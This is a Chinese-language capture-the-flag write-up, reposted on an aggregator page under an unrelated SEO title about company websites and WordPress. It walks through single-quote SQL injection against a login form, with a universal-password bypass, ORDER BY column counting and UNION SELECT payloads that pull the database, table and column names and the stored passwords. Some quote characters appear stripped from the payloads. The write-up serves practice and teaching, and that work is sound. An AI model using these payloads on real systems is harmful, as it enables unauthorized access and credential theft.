济宁企业网站建设wordpress页面发布不
news/
2025/10/6 21:17:20/
文章来源:
济宁企业网站建设,wordpress页面发布不,怎么申请公司注册,建网站注意什么打开题目
几次尝试#xff0c;发现输1 1#xff0c;页面都会回显NO,Wrong username password#xff01;#xff01;#xff01;
只有输入1#xff0c;页面报错#xff0c;说明是单引号的字符型注入 那我们万能密码试试能不能登录
1 or 11 #
成功登录 得到账号…打开题目
几次尝试发现输1 1页面都会回显NO,Wrong username password
只有输入1页面报错说明是单引号的字符型注入 那我们万能密码试试能不能登录
1 or 11 #
成功登录 得到账号和密码
我们登录一下发现什么也没有
爆破列名字段数
1 order by 4 # 页面报错 但是1 order by 3 #时
页面没有报错说明列名字段数为3
爆破数据显示位
1 union select 1,2,3 # 可以得到数据显示位为2和3
接着我们爆破数据库名
1 union select 1,2,database() # 得到数据库名为geek
爆破表名
1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schemageek #
当前数据库下的所有表名有 爆破列名
在这里我们先试试l0ve1ysq1表
1 union select 1,2,group_concat(column_name) from information_schema.columns where table_namel0ve1ysq1 #
得到其表下有三个字段 我们直接爆破password字段试试下面有没有flag
1 union select 1,2,group_concat(password) from l0ve1ysq1 #
得到数据
直接查看源代码得到flag
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/929715.shtml
如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!